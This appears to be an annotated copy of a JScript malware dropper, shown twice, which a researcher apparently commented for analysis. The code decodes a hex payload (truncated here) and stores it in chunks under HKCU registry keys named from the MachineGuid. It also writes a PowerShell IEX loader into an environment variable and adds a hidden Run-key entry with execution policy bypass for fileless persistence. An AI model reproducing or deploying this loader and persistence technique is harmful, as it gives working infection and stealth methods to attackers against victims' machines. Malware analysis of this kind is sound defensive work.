malwarezone/commented_script.ps1 Secret

## commented_script.ps1
<#
Obfuscated payload (the next stage, containing the PE):
#>
var obf_data1 = 'B323232323230237D202075656C635D2[...]';

<#
initialize:
#>
shell_app = WScript.CreateObject("shell.application");
fs_obj = new ActiveXObject("Scripting.FileSystemObject");

<#
decode the obfuscated content:
#>
var stage2 = obf_data1.split("").reverse().join("");
stage3 = '';
for (i = 0; i < (stage2.length / 2); i++) {
    stage3 += String.fromCharCode('0x' + stage2.substr(i * 2, 2));
}
var shell_obj = WScript.CreateObject("WScript.Shell");

<#
create the name of the key based on the Machine Guid:
#>
machine_guid = shell_obj.RegRead("HKLM\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid");
var pattern = /\-|[0-9]/g;
machine_guid = "A" + machine_guid.replace(pattern, "");
my_key = machine_guid.toLowerCase();
is_fresh = 0;

<#
check if the key already exist:
#>
try {
    shell_obj.RegRead("HKEY_CURRENT_USER\\SOFTWARE\\" + my_key + "\\");
} catch (err) {
    is_fresh = 1;
    shell_obj.RegWrite("HKEY_CURRENT_USER\\SOFTWARE\\" + my_key + "\\", "", "REG_SZ");
}
if (is_fresh == 1) {

    <#
    Divide the content on chunks and store it in form of registry keys:
    #>
    chunk = '';
    counter = 0;
    for (var i = 0; i <= stage3.length - 1; i++) {
        chunk = chunk + stage3.substring(i, i + 1);
        if (chunk.length == 4000) {
            shell_obj.RegWrite("HKEY_CURRENT_USER\\SOFTWARE\\" + my_key + "\\" + counter, chunk, "REG_SZ");
            counter = counter + 1;
            chunk = '';
        }
    }
    <#
    Write the last chunk:
    #>
    if (chunk.length > 0) {
        counter = counter + 1;
        shell_obj.RegWrite("HKEY_CURRENT_USER\\SOFTWARE\\" + my_key + "\\" + counter, chunk, "REG_SZ");
    }

    <#
    Fetch the PowerShell path:
    #>
    if (fs_obj.FolderExists("C:\\Program Files (x86)")) {
        var powershell_path = 'C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe';
    } else {
        var powershell_path = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe';
    }

    <#
    Save the command for reading the saved keys one by one:
    #>
    ps_cmd1 = 'for ($i=0;$i -le 500;$i++){Try{$abc=$abc+(Get-ItemProperty -path \'HKCU:\\SOFTWARE\\' + my_key + '\').$i}Catch{}}IEX($abc)';
    shell_obj.RegWrite("HKEY_CURRENT_USER\\Environment\\" + my_key, ps_cmd1, "REG_EXPAND_SZ");
    ps_cmd2 = '-ExecutionPolicy Bypass -windowstyle hidden -Command "IEX([Environment]::GetEnvironmentVariable(\'' + my_key + '\', \'User\'))"';

    <#
    Add the Run key for (fileless) persistence:
    #>
    shell_obj.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" + my_key, powershell_path + ' ' + ps_cmd2, "REG_SZ");

    <#
    Run the same powershell command immediately (as in the case of persistence):
    #>
    shell_app.ShellExecute(powershell_path, ps_cmd2, "", "open", 0);
}
	<#
	Obfuscated payload (the next stage, containing the PE):
	#>
	var obf_data1 = 'B323232323230237D202075656C635D2[...]';

	<#
	initialize:
	#>
	shell_app = WScript.CreateObject("shell.application");
	fs_obj = new ActiveXObject("Scripting.FileSystemObject");

	<#
	decode the obfuscated content:
	#>
	var stage2 = obf_data1.split("").reverse().join("");
	stage3 = '';
	for (i = 0; i < (stage2.length / 2); i++) {
	stage3 += String.fromCharCode('0x' + stage2.substr(i * 2, 2));
	}
	var shell_obj = WScript.CreateObject("WScript.Shell");

	<#
	create the name of the key based on the Machine Guid:
	#>
	machine_guid = shell_obj.RegRead("HKLM\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid");
	var pattern = /\-\|[0-9]/g;
	machine_guid = "A" + machine_guid.replace(pattern, "");
	my_key = machine_guid.toLowerCase();
	is_fresh = 0;

	<#
	check if the key already exist:
	#>
	try {
	shell_obj.RegRead("HKEY_CURRENT_USER\\SOFTWARE\\" + my_key + "\\");
	} catch (err) {
	is_fresh = 1;
	shell_obj.RegWrite("HKEY_CURRENT_USER\\SOFTWARE\\" + my_key + "\\", "", "REG_SZ");
	}
	if (is_fresh == 1) {

	<#
	Divide the content on chunks and store it in form of registry keys:
	#>
	chunk = '';
	counter = 0;
	for (var i = 0; i <= stage3.length - 1; i++) {
	chunk = chunk + stage3.substring(i, i + 1);
	if (chunk.length == 4000) {
	shell_obj.RegWrite("HKEY_CURRENT_USER\\SOFTWARE\\" + my_key + "\\" + counter, chunk, "REG_SZ");
	counter = counter + 1;
	chunk = '';
	}
	}
	<#
	Write the last chunk:
	#>
	if (chunk.length > 0) {
	counter = counter + 1;
	shell_obj.RegWrite("HKEY_CURRENT_USER\\SOFTWARE\\" + my_key + "\\" + counter, chunk, "REG_SZ");
	}

	<#
	Fetch the PowerShell path:
	#>
	if (fs_obj.FolderExists("C:\\Program Files (x86)")) {
	var powershell_path = 'C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe';
	} else {
	var powershell_path = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe';
	}

	<#
	Save the command for reading the saved keys one by one:
	#>
	ps_cmd1 = 'for ($i=0;$i -le 500;$i++){Try{$abc=$abc+(Get-ItemProperty -path \'HKCU:\\SOFTWARE\\' + my_key + '\').$i}Catch{}}IEX($abc)';
	shell_obj.RegWrite("HKEY_CURRENT_USER\\Environment\\" + my_key, ps_cmd1, "REG_EXPAND_SZ");
	ps_cmd2 = '-ExecutionPolicy Bypass -windowstyle hidden -Command "IEX([Environment]::GetEnvironmentVariable(\'' + my_key + '\', \'User\'))"';

	<#
	Add the Run key for (fileless) persistence:
	#>
	shell_obj.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" + my_key, powershell_path + ' ' + ps_cmd2, "REG_SZ");

	<#
	Run the same powershell command immediately (as in the case of persistence):
	#>
	shell_app.ShellExecute(powershell_path, ps_cmd2, "", "open", 0);
	}